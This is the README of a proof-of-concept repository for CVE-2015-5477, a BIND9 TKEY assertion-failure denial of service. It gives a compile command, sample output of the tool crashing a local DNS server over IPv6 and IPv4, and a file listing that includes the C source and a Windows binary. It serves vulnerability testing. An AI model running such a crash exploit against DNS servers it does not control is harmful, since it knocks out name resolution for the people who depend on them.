PoC exploit for CVE-2015-5477 BIND9 TKEY assertion failure# PoC for BOND9 TKEY assert DoS (CVE-2015-5477)
This exploit tests to see if a BIND9 server is vulnerable by sending
the exploit in order to see if it crashes.
It's C code that you compile the normal way on Unix/Window, such as:
# gcc tkill.c -o tkill
It'll run over both IPv4 and IPv6.
This is what it looks like running against `localhost`. Since it gets
two IP addresses resolving the name, it'll try both of them.
It first queries the "version" string, then sends the exploit.
When it probes the second address, the version query fails because
the service is already crashed from the first attempt.
root@kali:~/cve-2015-5477# ./a.out localhost
--- PoC for CVE-2015-5477 BIND9 TKEY assert DoS ---
[+] localhost: Resolving to IP address
[+] localhost: Resolved to multiple IPs (NOTE)
[+] ::1: Probing...
[+] Querying version...
[+] ::1: "9.11.0pre-alpha"
[+] Sending DoS packet...
[+] Waiting 5-sec for response...
[+] timed out, probably crashed
[+] 127.0.0.1: Probing...
[+] Querying version...
[-] timed out getting version, trying again
[-] timed out getting version, trying again
[-] timed out getting version, trying again
[-] Can't query server, is it crashed already?
[-] Sending exploit anyway.
[+] Sending DoS packet...
[+] Waiting 5-sec for response...
[+] timed out, probably crashed
[4.0K] /data/pocs/582eacfe39ed9715680c70a703aa3ee384a2424e
├── [4.0K] bin
│ └── [ 10K] win32-tkill.exe
├── [1.3K] README.md
└── [ 13K] tkill.c
1 directory, 3 files